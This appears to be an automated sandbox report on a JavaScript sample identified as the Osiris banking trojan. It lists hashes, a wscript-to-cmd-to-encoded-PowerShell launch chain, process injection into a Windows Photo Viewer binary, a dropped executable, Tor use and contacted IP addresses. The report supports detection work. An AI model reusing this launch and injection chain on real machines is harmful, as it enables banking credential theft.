Malware Analysis Report

2025-01-22 13:34

Sample ID 210722-837q3gwvfx
Target malware.js
SHA256 d0ac1b89cd4522882989b06c18ef2b80b05e07d64de1f562f79e2d631536fed3
Tags
osiris banker botnet
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d0ac1b89cd4522882989b06c18ef2b80b05e07d64de1f562f79e2d631536fed3

Threat Level: Known bad

The file malware.js was found to be: Known bad.

Malicious Activity Summary

osiris banker botnet

Osiris

Executes dropped EXE

Uses Tor communications

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-07-22 09:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-07-22 09:26

Reported

2021-07-22 09:32

Platform

win7v20210410

Max time kernel

240s

Max time network

272s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\malware.js

Signatures

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 2

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\malware.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "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 "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "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 "

Network

N/A

Files

memory/1536-59-0x0000000000000000-mapping.dmp

memory/316-60-0x0000000000000000-mapping.dmp

memory/316-61-0x0000000075561000-0x0000000075563000-memory.dmp

memory/316-62-0x0000000000940000-0x0000000000941000-memory.dmp

memory/316-63-0x0000000004810000-0x0000000004811000-memory.dmp

memory/316-64-0x00000000024E0000-0x00000000024E1000-memory.dmp

memory/316-65-0x0000000002200000-0x0000000002E4A000-memory.dmp

memory/316-66-0x0000000002790000-0x0000000002791000-memory.dmp

memory/316-69-0x0000000005740000-0x0000000005741000-memory.dmp

memory/316-74-0x00000000056D0000-0x00000000056D1000-memory.dmp

memory/316-75-0x0000000006120000-0x0000000006121000-memory.dmp

memory/316-82-0x0000000006290000-0x0000000006291000-memory.dmp

memory/316-83-0x000000007EF30000-0x000000007EF31000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-07-22 09:26

Reported

2021-07-22 09:32

Platform

win10v20210408

Max time kernel

300s

Max time network

260s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\malware.js

Signatures

Osiris

banker botnet osiris

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target | Count
N/A | api.ipify.org | N/A | N/A | 2

Uses Tor communications

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3724 set thread context of 788 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 5
N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A | 59

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Count
PID 656 wrote to memory of 3136 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\cmd.exe | 2
PID 3136 wrote to memory of 3724 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | 3
PID 3724 wrote to memory of 3384 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | 3
PID 3724 wrote to memory of 788 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | 10
PID 788 wrote to memory of 2196 | N/A | C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe | 2

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\malware.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "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 "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "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 "

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"

Network

Country | Destination | Domain | Proto
N/A | 193.23.244.244:80 | 193.23.244.244 | tcp
N/A | 8.8.8.8:53 | api.ipify.org | udp
N/A | 50.16.246.238:443 | api.ipify.org | tcp
N/A | 70.63.170.86:80 | 70.63.170.86 | tcp
N/A | 96.244.79.89:443 | N/A | tcp
N/A | 8.8.8.8:53 | time-a.nist.gov | udp
N/A | 129.6.15.28:13 | time-a.nist.gov | tcp
N/A | 51.89.143.158:80 | 51.89.143.158 | tcp
N/A | 54.36.237.163:80 | 54.36.237.163 | tcp
N/A | 37.153.16.170:80 | 37.153.16.170 | tcp
N/A | 188.68.37.135:80 | 188.68.37.135 | tcp
N/A | 199.249.230.122:80 | 199.249.230.122 | tcp
N/A | 192.236.193.142:443 | N/A | tcp
N/A | 5.100.139.8:80 | 5.100.139.8 | tcp
N/A | 199.249.230.71:443 | N/A | tcp
N/A | 172.107.92.18:80 | 172.107.92.18 | tcp
N/A | 199.249.230.102:80 | 199.249.230.102 | tcp
N/A | 31.207.89.49:80 | 31.207.89.49 | tcp
N/A | 198.46.166.157:443 | N/A | tcp
N/A | 91.223.82.156:80 | 91.223.82.156 | tcp
N/A | 195.201.141.166:80 | 195.201.141.166 | tcp

Files

memory/3136-114-0x0000000000000000-mapping.dmp

memory/3724-115-0x0000000000000000-mapping.dmp

memory/3724-118-0x0000000004A70000-0x0000000004A71000-memory.dmp

memory/3724-119-0x0000000007130000-0x0000000007131000-memory.dmp

memory/3724-121-0x0000000004A62000-0x0000000004A63000-memory.dmp

memory/3724-120-0x0000000004A60000-0x0000000004A61000-memory.dmp

memory/3724-122-0x0000000007080000-0x0000000007081000-memory.dmp

memory/3724-123-0x0000000007930000-0x0000000007931000-memory.dmp

memory/3724-124-0x0000000007AA0000-0x0000000007AA1000-memory.dmp

memory/3724-125-0x0000000007B10000-0x0000000007B11000-memory.dmp

memory/3724-126-0x0000000007F20000-0x0000000007F21000-memory.dmp

memory/3724-127-0x00000000082D0000-0x00000000082D1000-memory.dmp

memory/3724-128-0x0000000008250000-0x0000000008251000-memory.dmp

memory/3724-133-0x00000000092C0000-0x00000000092C1000-memory.dmp

memory/3724-134-0x0000000008F90000-0x0000000008F91000-memory.dmp

memory/3724-135-0x0000000009010000-0x0000000009011000-memory.dmp

memory/3724-136-0x0000000009860000-0x0000000009861000-memory.dmp

memory/3724-137-0x0000000009090000-0x0000000009092000-memory.dmp

memory/3724-140-0x0000000009470000-0x00000000095BC000-memory.dmp

memory/788-143-0x0000000000400000-0x0000000000456000-memory.dmp

memory/788-144-0x0000000000401698-mapping.dmp

memory/788-150-0x0000000003200000-0x000000000334A000-memory.dmp

memory/3724-151-0x0000000004A63000-0x0000000004A64000-memory.dmp

memory/788-149-0x0000000000400000-0x0000000000456000-memory.dmp

memory/2196-153-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5 b4cd27f2b37665f51eb9fe685ec1d373
SHA1 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA256 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512 e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

C:\Users\Admin\AppData\Local\Temp\x64btit.txt

MD5 14f8904cf8d36877990fa4f0743a8396
SHA1 8429f1370f2f08ddb81a06b16e0f40c309309ea3
SHA256 42fe128c1f7cdef6532a8228d19a21dead95fef57ed326d64cb3833d347081c9
SHA512 f7f6dcb8b0145362610e66b03ba55ad5fb9304ec5a713d8873b6b22b993d5ce7d248354adac9d285dd1d22a1e8678ff821d748cb8662fe39704a3ea8f8045469